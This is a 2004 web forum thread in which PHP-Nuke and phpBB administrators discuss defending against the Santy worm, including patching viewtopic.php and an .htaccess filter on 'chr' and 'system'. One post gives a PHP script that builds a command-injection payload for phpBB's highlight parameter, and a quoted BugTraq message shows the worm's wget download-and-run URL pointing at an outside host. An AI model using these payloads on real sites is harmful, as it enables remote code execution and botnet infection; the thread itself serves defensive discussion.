So how do we protect against the Santy worm?

Client Joined: Jul 18, 2003 Posts: 977

Thanks...

Posted: Wed Dec 22, 2004 9:36 am

phpBB boards running version 2.0.11 aren't vulnerable. Also google filtered the search string already so it shouldn't be "in the wild" anymore.

Posted: Wed Dec 22, 2004 9:45 am

Thank you. I am so paranoid... who's that?

Sells PC To Pay For Divorce Joined: Posts: 5661

somebody called ?

Posted: Wed Dec 22, 2004 10:50 am

Also if I understand it the correctly () chars are used in the request and they would be trapped even on a default nuke install.

Posted: Wed Dec 22, 2004 11:26 am

I'm running a heavily modified version of 6.9 and I really don't want to upgrade to a 7.x release in order to protect against this worm. I don't which would be worse, cleaning up after the worm or changing my codebase. And I've already cleaned up one phpBB site that I help maintain!

Posted: Wed Dec 22, 2004 11:39 am

Are you using Nuke-Sentinel?
If so I think you could enter viewtopic.php as one of the string blockers for some added protection and maybe even NeverEverNoSanity. I'm sure Bob, Raven and others are looking very closely at the specific exploit to see if it can be used against the bbtonuke port. This should work though because viewtopic should always be accessed as file=viewtopic not viewtopic.php

Posted: Wed Dec 22, 2004 11:46 am

No, I don't use Nuke-Sentinel but I have taken some preliminary actions to help prevent the exploit... Other than a .htaccess modification, of course.

Posted: Wed Dec 22, 2004 11:46 am

sixonetonoffun wrote:

Are you using Nuke-Sentinel?
If so I think you could enter viewtopic.php as one of the string blockers for some added protection and maybe even NeverEverNoSanity. I'm sure Bob, Raven and others are looking very closely at the specific exploit to see if it can be used against the bbtonuke port. This should work though because viewtopic should always be accessed as file=viewtopic not viewtopic.php

What could we put into the string blocker?

Posted: Thu Dec 23, 2004 7:54 am

Is it just in viewtopic.php? I ask this because I upgraded a few weeks ago to version 2.0.11 and I looked when I saw that posting and that file still had the old code in it. I replaced the code ASAP but was curious about it because people are saying that version 2.0.11 is already patched.

Posted: Thu Dec 23, 2004 8:00 am

Maybe its not enough to fix viewtopic.php ?
Today the results for search in goggle.de
"This site is defaced" 343.000 (für) this site is defaced NeverEverNoSanity WebWorm generation 15

Posted: Thu Dec 23, 2004 8:50 am

As an additional security measure, please find an example of a *.htaccess* file based security block in the next (to be inserted into $NUKEROOT .htaccess file - for those being influenced by the presence of htaccess);

Code:




Options +SymlinksIfOwnerMatch


RewriteEngine On


RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]


RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)


RewriteRule ^(.*) /

As a result of the above block, the parts of the commands being detected to be used in the worm's attack are filtered off prior to execution.

[please note: this may not be a bulletproof method for you - listed additional measures based on received recommendations from trusted ISP. It seems to be quite generally suspected, that this worm (or better, it's variants) will also use other medias than merely phpBB in the future to perform these sorts of attacks.]

-beetraham

Posted: Thu Dec 23, 2004 8:54 am

How did you get so many hits for that search? When I go to google.de and search for the phrase "This site is defaced" I only get around 3,590. Yesterday that number was only 1,520 on google.com.

Posted: Thu Dec 23, 2004 10:40 am

http://www.google.de/search?sourceid=navclient&hl=de&ie=UTF-8&rls=GGLD,GGLD:2004-47,GGLD:de&q=This+site+is+defaced

or you try: allinurl:viewtopic.php

Posted: Thu Dec 23, 2004 10:47 am

You should place quotes around your search string or just search for NeverEverNoSanity because you are getting a lot of false hits that have nothing to do with the Sanity worm.

Posted: Thu Dec 23, 2004 10:49 am

Oh yeah, the allinurl:viewtopic.php produces a 403. Google shut that search down because of Sanity.

New Member Joined: Jan 28, 2004 Posts: 10

I guess, sites that did not upgrade are safe far now...

Only registered users can see links on this board! Get registered or login!

Posted: Thu Dec 23, 2004 10:59 pm

Hopefully, it's a lesson well learned by Google and all.

Posted: Fri Dec 24, 2004 7:06 am

BohrMe wrote:

Hopefully, it's a lesson well learned by Google and all.

Somehow, I do think it will be.

Posted: Fri Dec 24, 2004 8:36 am

One of the regulars is seeing a variant that is intended to exploit the phpnuke port at a very disturbing rate approx 25 per hour. Sentinel trapped it but that indicates its getting passed Apache. I tested it on a couple of sites of my own and it throws a 403.

Best thing is to make sure your viewtopic.php is patched regardless of googles response.

Posted: Fri Dec 24, 2004 8:42 am

brine wrote:

Somehow, I do think it will be.

I've met some of the Google guys (namely Rob Pike) and they're sharper than you think.

registered · Posted: Fri Dec 24, 2004 10:42 am

You can use this script to see if your phpBB is vulnerable...

Code:

<?php


$p='ls -al';


$highlight='passthru($HTTP_GET_VARS[p])';





print "?t=%37&p=";





for ($i=0; $i<strlen($p); ++$i) {


 print '%' . bin2hex(substr($p,$i,1));


}





print "&highlight=%2527.";





for ($i=0; $i<strlen($highlight); ++$i) {


 print '%' . bin2hex(substr($highlight,$i,1));


}





print ".%2527";


?>

Running this script on your web site should generate a request parameter.

All you need to do is copy 'n' paste the result onto:

Code:

http://your-site.com/index.php?name=Forums&file=viewtopic

Example:

Code:

http://your-site.com/index.php?name=Forums&file=viewtopic&?t=%37&p=%6c%73%20...<yada,yada>

As sixonetonoffun said, Nuke should trap it, even on a default install... Wink

Site Admin/Owner Joined: Aug 27, 2002 Posts: 17088

NukeSentinel traps it, but if you want tp stop it at the server level, see my post http://www.ravenphpscripts.com/postp28870.html#28870

Posted: Sat Dec 25, 2004 7:59 pm

Just as a heads-up...

Quote:

[http://securityfocus.com/archive/1/385463/2004-12-22/2004-12-28/0]

To: BugTraq
Subject: New Santy-Worm attacks *all* PHP-skripts
Date: Dec 25 2004 5:12PM
Author: Juergen Schmidt <ju heisec de>
Message-ID: <Pine.LNX.4.58.0412251805110.19888@loki.ct.heise.de>

Hello,

the new santy version not only attacks phpBB.

It uses the brasilian Google site to find all kinds of PHP skripts.
It parses their URLs and overwrites variables with strings like:

http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget www.visualcoders.net/spybot.txt;...

Often enough this leads to download and execution of code. On success the worm connects to an IRC server, where already more than 700 zombies are waiting for commands.

Subject Matter Expert Joined: Feb 23, 2004 Posts: 358

Ok, now I understand exactly why I haven't had even one attack across an entire server running multiple Nukes and phpBB standalones. Way back when the Brazilian folks started focusing on Nuke vulns, I banned server-wide the entire continent of South America. I would then imagine that the brazilian Google engine has none of my server's content available.

Just luck, I guess... I've had those foos banned for almost 2 years, and now that this concentrated attack is under way, I haven't had even one hit so far. Wish I was this lucky playing the Lottery! Wink

PHrEEk